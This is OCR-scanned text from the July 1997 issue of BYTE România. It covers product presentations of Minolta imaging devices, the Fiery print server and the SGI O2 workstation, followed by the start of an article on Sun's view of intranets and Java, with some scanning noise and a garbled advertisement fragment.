gerul electronic propriu lansează câteva
salve de lumină, reduse în intensitate. Ast-
fel retina dilatată a subiectului se contrac-
tează şi totodată se autoreglează distanţa.
De asemenea, prin cuplaj optic pot fi declan-
şate eventualele blitz- uri fără fir pentru
luminare optimă a subiectului.
Pentru digitizarea imaginii, foloseşte 3 gru-
puri de senzori CCD, de câte 380.000 de
celule. Ele captează imagini cu dimensiunea
de 1528 x 1146 pixeli și cu o adâncime de
culoare de 24 biţi (8 biţi pe fiecare canal R,
G, B). Această rezoluţie este atinsă prin inter-
polarea pe diagonală o fiecărui pixel CCD
neacoperit.
Imaginile fotografiate sunt comprimate
rapid, rezultând fişiere cu imagini de câte
1.1 MB din imaginile de aproximativ 5 MB.
Minusculul disc hard intern de 130 MB face
posibilă stocarea unui număr de 114 ima-
gini. Pozele rezultate sunt bogate în detalii:
ele sunt construite din 1,75 milioane pixeli.
Transferul imaginilor pe calculator se face
în câteva minute printr-un cablu SCSI.
Copiator color CF 9oo
CE 900 este un copiator laser color multi-
funcţional, care totodată poate fi folosit şi
pe post de imprimantă color A3. Lucrează
la o rezoluție de 400 dpi şi poate vizualiza
256 nuanţe de culori. Este destinat depar-
tamentelor cu un volum de lucru ridicat.
IULIE 1997 BYTE România 87
Prezentări
Produse Minolta
Pentru a asigura o calitate superioară a
imaginii - granulaţie foarte bună, paletă co-
loristică bogată, textură foarte fină, detalii în
umbră etc.- foloseşte un sistem proprietar unic
pentru modularea intensității razei laser
LIMOS (Laser Intensity Modulation System)
şi valorifică o serie de alte tehnologii digitale
noi. Diametrul razei laser a fost redusă la un
sfert din punctul imprimat la rezoluţia nom-
inală şi astfel rezultă o tonalitate uniformă, cu
treceri line, lipsită de moar. Tonerul de gran-
ulație ultrafină introdus recent asigura o mai
bună dispunere pe suportul de listare şi o
dozare optimă. Are un nou sistem de stabi-
lizare a imaginii, care poate interveni în imag-
inea listată pentru o mai bună armonizare a
culorilor şi pentru a asigura o gradaţie opti-
mă între lumini şi umbre. Calitatea copiilor
este foarte bună şi au o stabilitate în timp ridi-
cată, iar costul tipăririi este de
cca. 0,5 $ per pagină.
CF 900 se distinge prin opera- -
rea simplă si calitate ridicată.
Panoul de comandă are un ecran
LCD senzitiv, cu comenzi intu-
itive, care permit accesarea celor
mai sofisticate funcții de proce-
sare a imaginilor. Imaginile pot
fi scalate cu un factor de
25%..300%. Pe ecranul editoru-
lui de culori propriu se poate
interveni manual în culoarea
oricărui element din document.
Acoperă integral formatul A3 şi
permite chiar mărirea pe mai
multe pagini (puteţi realiza afişe
mărite pe 36 foi A3! ). Pentru
mărirea eficienţei şi pentru a nu
încărca rețeaua, ultimele 10
documente listate sunt stocate pe
discul hard al imprimantei, ulte-
rior ele putându-se rechema
uşor.
Imprimanta are o fiabilitate ridicată şi o
durată de viaţă sporită a pieselor în mişcare și
a consumabilelor. Este destul de silențioasă şi
respectă o serie de norme specifice de protecția
mediului. Are un filtru pentru reducerea
emisiei de ozoni şi dispune de o unitate de reci-
clarea uleiului din sistemul de fixare.
Viteza de listare este de 6 ppm în modul co-
lor și 23 ppm la monocolor. Productivitatea
poate fi mărită prin accesorii opţionale ca uni-
tatea duplex (listare față-verso), sistemul de
sortare şi capsare a documentelor (pot fi sor-
tate 10 serii de documente cu număr identic
de pagini), server de imprimantă, unitate de
copiere de pe diapozitive, cameră foto digi-
tală etc. Tăvile pentru alimentare cu suport
de listare au o capacitate totală de 1300 coli.
Mecanismul de listare analizează din mers ca-
racteristicile suportului de listare şi se autore-
glează, putându-se folosi pentru listare o largă
88 BYTE România IULIE 1997
varietate de hartie (60..90g) si suport plastic
pentru retroproiector.
Scaner QuickScan 35 Plus
Cu ajutorul acestui scaner rapid şi uşor de ma-
nevrat pot fi scanate filme negative sau diapo-
zitive de 35 mm, formatul maxim al imaginii
scanate fiind 24,2x36,3 mm. Reproducerile
digitale rezultate au o calitate foarte bună: re-
zolutie maxima este de 2820 dpi (110 pixeli
/mm), dimensiunea imaginii este de pana la
2688 x 4032 pixeli siau o profunzime de cu-
loare de 30 de biţi per pixel (câte 10 biţi pen-
tru componentele RGB). Viteza de scanare es-
te de 12 sec pentru imagini de mărimea 1000
x 1000 pixeli, şi de 60 sec pentru imagini com-
plete la rezoluţie maximă, cu o durată de
pre-scaning de 6 sec. Scanarea şi separarea
de culori se realizează într-o singură trecere,
Copiatorul laser color CF 900.
iar imaginea digitizată este transferată calcu-
latorului printr-o interfață SCSI-2. Ele sunt
disponibile tuturor aplicaţiilor Windows
TWAIN compatibile sau pe sistemele Macin-
tosh prin plug-in-uri pentru PhotoShop.
Focalizarea imaginii se poate face manual
sau automat, putându-se urmări instantaneu
pe ecran întreaga imagine. De asemenea, se .
poate realiza manual echilibrarea culorilor,
rotirea imaginilor, centrarea etc. şi există
posibilitatea autoexpunerii cu echilibrarea
albului. Cerinţele de sistem sunt mici:
486DX/66 cu 16 MB RAM, placă video 24
biti si Windows 3.1/95, sau Macintosh
68030/25 MHz, 20 MB RAM, placa grafica
de 24 sau 32 biti, sistem de operare 7.1 sau
mai mare si Photoshop ver 2.5.
Server de imprimare Fiery X]+
Este cea mai noua generatie de servere de
listare color a firmei Electronics for Imaging,
Inc. (EFI). Termenul „Fiery Print“ tinde să
devină un standard de facto în listările color
de înaltă calitate, la viteze ridicate. Acest
server de listare are o putere de procesare
foarte mare și asigură o tipărire documen-
telor multipagină încărcate cu grafică com-
plexă la viteza maximă a mecanismului copi-
atorului. Cu ajutorul lui se pot tipări
documente complexe în rețea, în modul Post-
Script, din mediile PC, Mac sau UNIX.
Construit într-o tehnologie proprietară,
familia Fiery aduce schimbări fundamentale.
în domeniul serverelor de imprimare. Are
un sistem de operare proprietar, optimizat
pentru operaţii de listare color în timp real.
Un procesor RISC dedicat, de tipul MIPS
R4700, se ocupă de prelucrările PostScript
calcul-intensive. Circuite complexe din seria
RipChips rezolvă accesul intens la
memoria de lucru, specifice listării
în culori. Astfel, în timp ce inter-
pretează comenzile PostScript, pro-
cesorul primeşte şi prelucrează
simultan imaginea următoare.
Datele sunt vehiculate pe o magis-
trală sistem de 128 biţi cu o viteză
de transfer foarte mare, eventualele
gâtuiri în transmiterea datelor fiind
eliminate complet.
Instalate în rețea Ethernet sau
Token Ring, aceste servere suportă
protocoalele TCP/AP, Novell IPX
şi AppleTalk și comută automat
între. Gestiunea şi contorizarea
volumului listat se face ușor de la
staţiile de lucru, iar ecranul LCD
propriu asigură un control local al
funcţiilor cheie ale serverului.
Cuplat la imprimanta color
CF900, un server Fiery asigură un
raport maxim preţ/performanţă,
la o calitate profesională a culo-
rilor. Datorită utilitarelor de calibrare încor-
porate - EFI Color Management și cali-
brare Pantone -, aplicaţiile DIP dobândesc
o calitate fotografică. Un lucru important -
această soluţie multifuncţională copiator-
imprimantă-scaner color asigură o tipărire
economică pentru serii mici, la calitate pro-
fesională, şi este foarte adecvată grupurilor
de lucru.
Această soluţie proprietară a companiei
Minolta, prezentată şi la CERF'97, este
adecvată departamentelor de imaginistică şi
asigură o prelucrare completă, la calitate pro-
fesională a informaţiei vizuale color. Merită
să-l vedeţi la lucru la sediul firmei Minolta
România!
DI. Veres Victor este redactor la PCReport, poate
fi contactat prin e-mail la weres@agora.ro.
www.agora.ro/byte/
Staţii grafice
Prima arhitectură de memorie unificată de înaltă performanță.
Staţia de lucru desktop 02
taţia de lucru O2 reprezintă un
sistem inovator care combină
performanţa oferită de Silicon
Graphics cu puterea unui me-
diu utilizator integrat Web. Îmbinând per-
formanţa de vârf din industria procesoa-
relor cu tehnologia UMA (Unified Memory
Arhitecture), 02 furnizează o lăţime de
bandă internă incredibilă pentru accelera-
rea procesării grafice și pentru aplicaţiile
care folosesc intens procesorul. Arhitectura
UMA i-a permis lui Silicon Graphics să facă
posibil un nivel ridicat de performanta la
un pret avantajos.
Arhitectura memoriei unificate pe care o
prezintă 02 permite în mod standard reali-
zarea de grafice 3D şocante, o puternică pro-
cesare de imagini și o procesare video în timp
rea! care depăşeşte cu mult limitele atinse
de celelalte maşini din clasa sa. Aceste ca-
racteristici fac din O2 staţia de lucru ideală
pentru modelare CAD, post-procesare,
creare de sit Web și pentru vizualizări ştiinți-
fice. Compresiile standard hardware și
software transformă orice utilizator într-un
editor video în timp ce este oferită calitatea
pe care o cere acel profesionist video.
02 combină performanţa unei staţii de
lucru Silicon Graphics cu puterea oferită de
World Wide Web, fiind primul sistem care
furnizează posibilităţi profesionale pentru
medii digitale şi unelte de creaţie Web. Cu
interfeţe completintegrate Web, utilizatorii
comunică mult mai ușor decât înainte folo-
sind intranet-urile companiei și Internetul.
O nouă arhitectură pentru
interactivitate
Cu staţia de lucru desktop 02, Silicon
Graphics a creat prima arhitectură de me-
morie unificată din industria de profil. UMA
transcende design-ul inflexibil al staţiilor de
lucru tradiționale și al calculatoarelor per-
sonale, care datorită unei distribuiri a mem-
oriei grafice, a celei de prelucrare de imag-
ini şi a celei video realizau o constrângere a
performanţei. 02 permite performanţe
extraordinare prin integrarea unor puter-
nice resurse de procesare video, de com-
presie, de grafică, de procesare a imaginii şi
I/O, folosind o memorie sistem cu o largă
lăţime de bandă și o întârziere mică.
Faţă de arhitecturile PC-urilor și staţiilor
de lucru tipice în care datele erau transfera-
te între diferitele cartele cu memorii video,
grafice şi de imagini, datele 02 se află la un
loc în memoria principală, unde fiecare
procesare un acces direct. Cu ajutorul UMA,
memoria sistem, buffer-ul pentru cadre, z-
buffer-ul, memoria texturii, memoria de ren-
dering, memoria pentru imagini şi memoria
video sunt toate situate în același loc. Nu mai
există cartele dedicate de memorie care să fie
utilizate doar la momente specifice de timp;
cu O2, memoria este în mod automat realo-
cată conform cerinţelor existente. Acum,
expandarea memoriei pentru textură devine
o simplă problemă de achiziţionare a unui
upgrade standard de memorie.
Dispozitivul I/O al 02 maximizează per-
formanţa prin eliminarea problemelor ce
realizau o sugrumare a latimii de banda care
bloca chiar și cele mai rapide componente ale
sistemului. 02 furnizează performanţe de
“vârf în rețele 10BaseT/100BaseTX Ethernet,
prezintă o implementare SCSI duală Ultra
Fast/Wide, o magistrală de extensie PCI pe
64 de biti si multe alte opţiuni I/O standard.
Statia de lucru O2 este dotata cu proce-
soare R10000 sau R5000 MIPS pe 64 de biti,
furnizand performante de varf pentru apli-
catiile industriale. Cu R5000 - un procesor
de Daniel Moldovan
MAGIC
NSIC ya\
Bucuresti
230.04.78
230.04.80
Erie 7]
sirom.kappa.ro
care oferă performanţe excelente în proce-
sare, grafică și aplicaţii - utilizatorii obţin un
raport preţ/performanță competitiv. Proce-
sorul R10000 furnizează o putere de proce-
sare de vârf pentru majoritatea aplicaţiilor.
Elegantul sistem O2 are un design modu-
lar partajat pe cinci subansambluri pentru
a simplifica upgrade-ul si intretinerea -
unitatile drive, modulele sistem si cartelele
PCI pot fi accesate cu ușurință din partea
posterioară a sistemului. Această simplitate
este reflectată de uneltele de administrare
ale sistemului 02, care ghidează utilizatorii
prin funcţii simple de configurare și între-
ţinere. Servicii suplimentare sunt disponi-
bile ulterior printr-o serie de opţiuni de
garanție și sisteme de suport on-line.
Silicon Graphics pur
Performanțele de vârf din domeniul graficii
3Dşial procesării de imagini pe care le oferă
staţia de lucru 02 întruchipează tot ce aţi
auzit vreodată despre performanţa şi realis-
mul oferit de Silicon Graphics. Construit pe
un subsistem grafic OpenGL nativ și pe o
arhitectură UMA, 02 furnizează un nivel de
interactivitate care nu este disponibil la
nici una din maşinile din clasa sa. Aceste
posibilități remarcabile sunt prevăzute în
mod standard pentru fiecare configuraţie,
IULIE 1997 BYTE România 89
Prezentări
Stație de lucru desktop O2
oferindu-vă toată performanţa grafică şi de
procesare de imagini de care aveţi nevoie.
Cu o grafică standard dublu buffer-ată
pe 32 de biţi şi funcţii avansate, accelerate
hard, 02 oferă putere şi o calitate deosebită
la îndemâna fiecărui utilizator. Funcţiile
accelerate includ maparea texturii, z-buffer,
puncte și linii netezite, precum şi umbriri şi
conversii de culoare.
Capacitatile de mapare a texturii, accelera-
te hard oferite de statia de lucru O2 aduc un
nou nivel de realism și interactivitate. În CAD
și animație, maparea texturii permite utiliza-
torilor să-și vizualizeze modelele cu un nivel
de realism care surclasează modelele de um-
brire tradiționale. Faţă de alte cartele grafice
care stabilesc o limită pentru memoria textu-
rii, datorită flexibilităţii Arhitecturii Memoriei
Unificate este permisă alocarea unei cantități
nelimitate de memorie pentru texturi.
Implementând toate funcţiile cheie ale
hard-ului OpenGL ale sistemelor Silicon Gra-
phics de ultima ora - Indigo, IMPACT si Infini-
teReality - O2 permite acum utilizatorilor să
aleaga un nivel al puterii grafice la acel pret ca-
re se potriveste cel mai bine cu cerintele lor.
O2 furnizeaza capacități de înaltă perfor-
manta în procesarea de imagini, folosind
extensiile de procesare de imagini ale
OpenGL şi maparea texturii. Implementate
hard, aceste extensii permit utilizatorilor să
manipuleze seturi mari de date, imagini de
înaltă rezoluţie, totul în timp real - realizând
la fel de uşor manipularea unei imagini de
200MB ca și cea a uneia de 2MB. Furnizând
cea mai puternică performanţă din clasa sa,
O2 ridică standardul în ceea ce priveşte pute-
rea de procesare a unei stații desktop.
Prima staţie de lucru video
nativă
Staţia de lucru 02 este o mașină video nativă
reală - primul sistem care integrează în arhi-
tectura sa video, audio şi tehnologii de
compresie în timp real ca şi componente fun-
damentale. Arhitectura flexibilă pe care o
oferă 02 permite aducerea directă a video-
ului în memorie ca și un tip standard de date.
Odată acolo, grafica, procesarea imaginilor
şi motoarele de procesare pot accesa și
manipula datele în timp real.
Cu fiecare proces capabil să acceseze
datele din memoria principală, 02 furni-
zează capacități de manipulare video care nu
au mai fost atinse de modelele din clasa lui.
Aplicațiile pot decoda o sursă video com-
primată şi să o folosească ca și pe-o hartă a
texturii, sau să utilizeze hardul de procesare
a imaginii pentru a încețoşa sau distorsiona
un flux video în timp real. Utilizatorii vizuali-
zeaza video-ul în formatul său nativ datorită
capacității stației 02 de-a afişa pixeli video
care nu sunt sub formă de pătrat.
O2 este prima statie desktop care include
în fiecare sistem compresie JPEG în timp real
şi hard pentru decompresie. Suportând o rată
de compresie de până la 4:1, 02 furnizează
un nivel de calitate care întruneşte cerințele
pieţei. Semnalul audio independent poate fi
sincronizat cu datele video. 02 furnizează
două canale pentru intrări simultane şi un
canal pentru iesire pentru D1 si video analog.
Suplimentar fata de capacitatile in timp-
real, 02 implementează un domeniu larg de
algoritmi de compresie video folosind soft-
ware, inclusiv standarde industriale cum ar fi
QuickTime, AVI si Cinepak. Aceste capacități
înglobate permit utilizatorilor să creeze și să
editeze video pe 02, iar apoi să-l distribuie
prin Web către orice computer pentru play-
back.
O2 vă poate transforma aplicaţia într-o
sursă video prin facilitarea ca orice porţiune
din ecran să poată fi înregistrată în timp real
direct pe disc, eliminând nevoia unui VCR
pentru o editare video. Utilizatorii pot oferi
de asemenea înregistrarea video în exterior
via un port S-Video sau video complex.
Mediu de lucru utilizator
integrat Web
Fiecare O2 este lansat cu o suita de unelte
ce permit intranet care includ Netscape
Navigator 3.0, Netscape Mail si Netscape
News Reader 2.0 precum şi soft de publicare
pe Web de la Silicon Graphics care utilizează
serverul FastTrack de la Netscape si unelte
aero sistem Re dry
acca:
90 BYTE Romania IULIE 1997
de creatie WebMagic Pro. Navigarea Web si
protocoalele de rețea TCP/IP sunt complet
integrate în interfaţa utilizator și sistemul de
operare. Uneltele de creaţie pentru mediile
digitale oferă fiecărui utilizator posibilitatea
de-a dezvolta rapid conținut pentru proiecte
cum ar fi pagini Web care încorporează
video, audio și grafice 3D. 02 suportă soft-
ul Windows 95 al Insignia pentru a oferi uti-
lizatorilor un acces la cele mai populare apli-
catii PC. Acest soft permite hard-ului O2 sa
accelereze procesele playback multimedia.
De asemenea 02 oferă şi o integrare în
retelele NetWare si AppleTalk.
Ajutorul bazat pe Web oferă utilizatorilor
O2 posibilitatea de-a accesa documentaţii de
oriunde din propria rețea sau din Internet,
oferind un acces sigur la majoritatea infor-
maţiilor tehnice de actualitate.
Uneltele de videoconferință InPerson 2.2
ale Silicon Graphics permit o colaborare în.
timp real care depășesc orice distanțe
geografice. Ele includ posibilități de lucru
2D şi 3D care permit utilizatorilor să vizuali-
zeze, să manipuleze şi să ataşeze adnotări
pentru medii digitale, precum și realizarea
de comunicaţii folosind camera digitală
02.33
Daniel Moldovan este redactor la BYITE Româ-
nia. Poate fi contactat la dmoldovanQagora.ro.
www.agora.to/byte/
Bazele INTRANET,
în viziunea Sun
Pentru ca o întreprindere să aibă succes, astăzi mai mult ca oricând,
trebuie să beneficieze de un sistem de comunicare rapid şi performant,
atât cu partenerii şi clienţii cât și cu furnizorii săi externi
De Roxana Marin.
nima tehnologică menită să răspundă exigenţelor de
comunicare dintr-o întreprindere, o constituie con-
ceptul „Network Computing“.„ The Network Is The
Computer“ („Adevărata putere a unui calculator stă în
reţeaua și serviciile din spatele său“), filozofia adoptată de Sun încă
de la înfiinţare, în 1982, se află în centrul dezvoltării reţelei intranet,
lucru ce a determinat ca din ce în ce mai multe companii din lume
să apeleze la soluţiile Internet / intranet.
Java, limbajul de programare al Sun, este doar una dintre căile
prin care Sun vă ajută să folosiți tehnologiile Web, pentru a fi com-
evoluţia logică a Interne-ului în cadrul paradigmei informatizare,
vom face un scurt istoric al evoluţiei calculatorului și a rețelelor infor-
matice.
De la începuturile informaticii profesionale, au existat trei „va-
uri“ distincte de evoluţie și realizare a sistemelor informatice. Primul
val l-a constituit implementarea main-frame-urilor alături de ter-
minalele „oarbe“; al doilea val a fost cel al minicalculatoarelor cu
aceeaşi interfață de terminal „orb“. Ambele valuri au adus avanta-
je directorilor pentru tehnologii informatice (IT), aceștia putând
avea un control centralizat al datelor, aplicaţiilor şi interfeţelor uti-
petitivi. Este primul lizatorilor.
limbaj care raspunde Actualul (al treilea)
provocării de a fur- Cele trei valuri ale informaticii val este reprezentat de
niza aplicații dinami- cele mai multe corpo-
ce în reţele de tip in- rații şi este personalizat
tranet. de reţelele bazate pe
NC PC-uri conectate la ba-
Intranet - ze de date centralizate.
ce este și cum Aplicațiile care rulează
a evoluat Intranet pe PC-uri pot accesa
datele corporatiei prin
Cea mai concisa de- rețea, de pe serverele pe
finiţie aintranet-ului | 4 i | te „4 caresuntstocateinfor-
este „implementarea 0 | 70 | #0 | 90 | 2000 | matiile. Un seas
tehnologiilor Inter- scenariu este in mod
net in cadrul unei in- Mainframe Computing — Desktop Computing Network Computing obişnuit numit „client-
stitutii / intreprin- ‘Data Processing Office Automation Infouation Society server“ şi este tipic
deri“. structurilor IT aflate
Un intranet nu im- astăzi în întreprinderi.
plică neapărat şi conectarea sa la reţeaua publică globală Internet.
Totuşi, conectarea unei reţele intranet la Internet aduce multe
beneficii.
Imaginaţi-vă un Web intern care vă permite să accesaţi o mare
cantitate de informaţii de firmă, stocate pe un server. Imaginati-va
că sunteţi capabil să creați şi să distribuiţi documente şi informaţii
eficient şi rapid, folosind un software simplu și ieftin de tip Web
browser.
Deşi reţelele de tip Internet şi intranet se bazează pe aceleaşi
tehnologii, ele diferă totuși şi foarte mult. Pentru a percepe mai bine
Deşi, conform acestui model, datele sunt centralizate şi se află sub
controlul IT, aplicaţiile şi interfețele utilizator se află pe desktop-urile
utilizatorilor, adesea creând mari probleme de administrare şi mente-
nanta.
Următorul val al informatizării îl constituie intranet-ul. Acesta a
preluat tot ce este mai bun din cele trei valuri anterioare, furnizând
„putere“ utilizatorilor, concomitent cu simplificarea managemen-
tului și administrării.
Arhitectura unui intranet este foarte asemănătoare cu cea de tip
client-server, cu deosebirea că rolul staţiilor de lucru este mult dimi-
IULIE 1997 BYTE Romania 91
Intranet
Bazele Intranet, în viziunea SUN
nuat. Ca şi în arhitectura client-server, datele
se stochează centralizat pe același tip de
echipamente de baze de date, o parte din
datele procesate migrând de pe staţiile de
lucru pe servere. In plus, controlul aplicaţii-
lor şi al mediilor de operare se face mai mult
prin servere decât prin staţiile de lucru,
ambele comunicând în rețea prin inter-
mediul protocoalelor standard. Astfel, deşi
aplicațiile, interfețele utilizator şi datele sunt
toate sub controlul departamentului IT, uti-
lizatorii au totuşi un acces flexibil la date,
datorită rețelelor tip client-server.
Multe din tehnologiile care permit reali-
zarea unui intranet îşi au rădăcinile în Inter-
net si World Wide Web. In Internet puteti
folosi aproape orice tip de calculator si
puteti comunica cu orice alt tip de calcula-
tor în mod complet transparent. Acest lucru
s-a realizat pe baza unor protocoale stan-
dard care sunt implementate pe multe din
platformele hardware, în sisteme de opera-
re şi în aplicaţii.
După 1993, Internet-ul a devenit prac-
tic parte integrantă a vieții moderne atât
pentru publicul larg cât și pentru instituții şi
companii. O evoluţie spectaculoasă, având
în vedere că la începuturile sale era numai
un instrument de comunicare între insti-
tuțiile guvernamentale, academice şi ştiinţi-
fice.
Această metamorfoză a fost provocată de
Word ide Web care a permis transferul şi
vizualizarea pe monitor a documentelor,
între servere și clienţi. Integrarea serverelor
Web cu bazele de date şi alte sisteme desti-
nate aplicaţiilor distribuite pe platforme
independente s-a realizat în timp record.
Aceste tehnologii stau la baza realizării
reţelelor de tip intranet.
Se poate avea încredere în
tehnologiile Internet
pentru medii deosebite?
Fără nici o îndoială, multe din preocupările
privind securitatea și fiabilitatea pe Internet
sunt îndreptăţite având în vedere dimensi-
unile imense ale unei astfel de rețele, cu zeci
de milioane de utilizatori. De aceea, proiec-
tanții de sisteme de operare, aplicaţii și plat-
forme hardware depun eforturi susţinute
pentru dezvoltarea tehnologiilor Inter-
net/intranet.
Intranetul este, după cum se ştie, urmarea
logică a conceptului „Network Compu-
ting“. Utilizând protocoale standard, adop-
tate de marile companii producătoare de
hardware și software, s-a asigurat indepen-
denta fata de soluţii „proprietar“. Prin uti-
lizarea unei singure interfete utilizator pen-
tru toate datele vehiculate, intranet-ul oferă
posibilitatea de a capacita departamentul IT
al unei întreprinderi asupra întregii rețele,
economisind astfel fonduri și mărind dispo-
nibilitatea globală a sistemului.
Într-un intranet, toate calculatoarele
cooperează în reţea, indiferent dacă sunt
„Stații de lucru, servere aplicaţii sau baze de
date, obținându-se astfel un sistem robust
de care beneficiază întreaga întreprindere.
Avantajele oferite de intranet constau în
comunicații mai rapide, management de
rețea și furnizare de informaţii mai simplu,
„accesul liber sau controlat la bazele de date
ale corporației, economii financiare majore,
creșterea productivităţii angajaţilor, Sursă
de date unică şi o Interfaţă client universală.
Terminalul pentru intranet
Un browser Web este o aplicaţie software
prin care se pot accesa documente de pe
serverul Web, documente scrise în HTML
(Hyper Text Markup Language) care repre-
Vrei să știi ce
92 BYTE Romania IULIE 1997
SWLASINY cu ul
din lumea IT?
publicat —
oS si ce se va publica în
Viowsi.2 mek 1997
pSticile zilei. mascarea
see s dei,
tite Rata 3
Coon] onpans ntomatin: SĂ
‘onl Deck
aT
PSBESIDVIE Romina
OAD Fopos
paettaise
ih peroaca 2-4 aprile E cartus certruau voscone
An Sani s-a cestăsural
ka Internet zenvice
pee viddes ix
Bazele Intranet, în viziunea SUN
Intranet
zinta un standard de codare a documentelor
care contin text şi grafică.
Un browser Web nu se limitează numai
la a afişa pe monitor documente scrise în
HTML, ci poate de asemenea, să solicite
imagini, sunet, secvenţe video și aplicaţii de
la un server. Caracteristica esenţială care a
condus la acceptarea largă a acestei tehno-
logii în cadrul Internet - şi ulterior intranet
- este aceea că limbajul HTML permite ca
un document să fie „alipit“ altui document
din intranet sau din reţeaua publică Inter-
net. Aceasta înseamnă că un utilizator nu tre-
buie să cunoască localizarea unui anumit
document sau surse de informaţii pentru a
O accesa, acestea putând fi accesate printr-un
simplu click de mouse.
HTIP controlează transferul de docu-
mente intre servere și clienţi definind o
cale standard de comunicare între aceştia.
Serverele HTTP sunt disponibile pentru
toate tipurile de platforme hardware şi sis-
teme de operare. Organizațiile care au deja
servere în rețele LAN bazate pe Windows
NT sau Novell pot obţine un server HTTP
care să ruleze în serverele file/print proprii;
utilizatorii care folosesc deja sistemul UNIX
în rețeaua organizaţiei lor nu trebuie decât
să adauge un software de server HTTP la sis-
temul existent. Pe măsură ce întreprinderi-
le valorifică potenţialul tehnologiilor
intranet, ele vor achiziţiona servere Web
dedicate, care în marea lor majoritate sunt
sisteme UNIX. Este important să reamintim
că această tehnologie nu este tocmai nouă,
estimându-se că există cca 200.000 servere
Web în rețeaua Internet și peste 25 milioane
de browsere.
Practic, un server Web trece informaţia
către O execuţie exterioară, care este scrisă
în mod uzual în C, Java, Perl sau alt limbaj
din UNIX. Acesta este modul în care se pot
accesa aplicaţii exterioare cum ar fi bazele
de date, atât pentru restabilirea, cat $i pen-
tru centralizarea informaţiilor. Procesul se
manifestă efectiv ca o „poartă“ (gateway)
între serverul Web și aplicaţie. O astfel de
procedură este larg disponibilă şi permite
relativ simplu să integreze un server Web cu
orice aplicaţie de baze de date importantă
(de fapt, cei mai mulți furnizori de aplicații
de baze de date încorporează această
funcţionalitate în produsul lor de bază).
Instituţiile utilizează această facilitate
pentru a asigura o interfață utilizator stan-
dard pentru toate documentele și sursele de
date ale companiei. Spre deosebire de mode-
lul client-server, serverele care interacți-
onează cu bazele de date sunt cele contro-
late centralizat, şi nu orice calculator
individual din reţea.
Avantaje serverelor Web sunt utilizarea
uşoară, cheltuieli reduse de întreținere si
administrare, pot fi integrate toate echipa-
mentele existente prin simpla instalare a
browserelor, există susținere industrială
largă şi se interconectează cu aplicații și baze
de date deja existente.
Fenomenul Java
Deşi se pot crea documente complexe care
sunt vizibile pe orice platformă și incorpo-
ra sisteme simple de feedback care, cu aju-
torul formularelor, culeg răspunsurile de
la utilizatori, HTML poate face mai mult
decât să afişeze un document. Aici intervine
Java. Simplu spus, Java este un limbaj de pro-
gramare. Dezvoltat de Sun Microsystems,
este construit pe baza principalelor carac-
teristici ale Web-ului, cu scopul de a adău-
ga noi capabilități şi funcţionalităţi într-un
intranet.
Conceptul care stă la baza fenomenului
Java este unul simplu: independenţa reală
a platformei. În sistemele informatice de
astăzi, dacă vrei să dezvolţi o nouă aplicaţie
aceasta trebuie scrisă pentru o combinaţie
specifică de hardware şi sistem de operare.
De exemplu, o aplicaţie dezvoltată pentru
Windows nu va putea fi rulată pe o staţie
UNIX. Java a fost proiectat să rupă legăturile
dintre aplicație și sistemul de operare, ast-
fel încât să se poată crea aplicaţii ce pot fi
rulate pe orice platformă, după cum un do-
cument Web poate fi vizualizat prin orice
browser.
Programele scrise în Java se prezintă în-
tr-un format special cunoscut sub denu-
mirea de „byte-code“. Pentru a deveni
funcțională, aplicaţia trebuie rulată pe un
calculator care în prealabil are instalat „Java
Virtual Machine“.
„Java Virtual Machine“ este o aplicaţie,
software care interpretează fișierul Java
„byte-code“ şi îl transformă în instrucțiuni
pe care calculatorul și sistemul de operare
le poate înțelege. Mașinile virtuale Java sunt
disponibile în mod curent pentru multe sis-
teme de operare diferite și se află în conti-
nuă dezvoltare. JVM ocupă cca 200 KB
memorie si este deja încorporată în ultimele
cele mai importante browsere Web. Prac-
tic, aceasta înseamnă că orice calculator din
intranetul dvs este gata pregătit pentru Java
prin simpla instalare a unui browser Web
modern.
Mai mult, Sun a lansat chiar procesoare
Java capabile să execute direct cod-java, fără
a mai necesita programe intermediare pen-
tru implementarea mașinii virtuale Java.
Pionierii intranetului adaugă deja func-
tionalitati interactive prin încorporarea în
documente de mici aplicaţii Java, cunoscute
sub denumirea de „applets“.
Dar acesta este numai începutul revoluţiei
Java. Pe termen lung, se are în vedere ca
maşina virtuală Java să devină miezul sis-
temului de operare pentru toate calcula-
toarele, cu aplicaţii scrise în limbajul Java
disponibile în intranet și Internet sau furni-
zate în forma tradițională (manual sau
suport magnetic).
Network Computer
Dacă tot ce este necesar pentru calcula-
torul unui utilizator este o aplicație brow-
ser, atunci el mai are nevoie de un calcula-
tor tradiţional (PC), încărcat cu sistem de
operare grafic, multă memorie și hard-disk?
Această întrebare si-au pus-o multe com-
panii, inclusiv Sun, atunci când şi-au propus
să producă un calculator de reţea dedicat
(NC), care să cuprindă toate functionalita-
ţile necesare pentru a lucra într-un intranet.
În conformitate cu un studiu efectuat de
Gartner Group în aprilie 1996, costul mediu
anual de funcționare, administrare şi între-
tinere al unui desktop / PC, este de 11.900
US$ spre deosebire de cel al unui NC care
se ridică la numai 2.500 US$.
Tendinţa este ca institutiile/intreprin-
derile să-şi centralizeze biblioteca de apli-
caţii bazate pe Java, pe serverele de apli-
caţii dedicate. Când un utilizator va avea
nevoie de rezolvarea unei probleme speci-
fice, el va naviga cu browserul pe intranet
şi-şi va extrage aplicaţia dorită de pe serverul
de aplicaţii, iar datele relevante de pe
serverul HTTP. Această paradigmă va per-
mite departamentului informatic dintr-o
întreprindere să poată şti permanent care
sunt resursele de aplicaţii ale utilizatorilor,
să le poată administra, actualiza şi autoriza
centralizat.
Parteneri Java
Java a fost licenţiată tuturor companiilor
importante de software. Marii producă-
tori de aplicaţii de baze de date, Oracle,
Informix, Ingres şi Sybase, încorporează
tehnologiile Java în produsele lor de baze de
date. Producătorii de browsere cum ar fi
Netscape, Spyglass (Mosaic) si Microsoft au
introdus în browserele lor mașini virtuale
Java. Astfel, se pot cumpăra deja browsere
Java pentru Windows, Windows 95, Win-
dows NT, UNIX si Macintosh. Alaturan-
du-se diviziei SunSoft, Borland si Symatec
au proiectat medii de dezvoltare pentru apli-
catii Java si instrumente de programare, iar
IBM/Lotus au luat o decizie fundamentala
în ceea ce priveşte integrarea tehnologiilor
Java in OS/2, AIX si Notes.
Avantaje utilizării tehnologiilor Java sunt
cheltuielile reduse de funcţionare pentru
staţiile de lucru, integrarea în intranet a sis-
temelor deja existente, o singură interfață
utilizator, potenţial pentru NC-uri cu un
preț scăzut, limbaje de dezvoltare unificate
IULIE 1997 BYTE Romania 93
Intranet
Bazele Intranet, în viziunea SUN
şi managementul centralizat al aplicaţiilor.
Rețeaua
În dein 10 ani, administratorii de retele
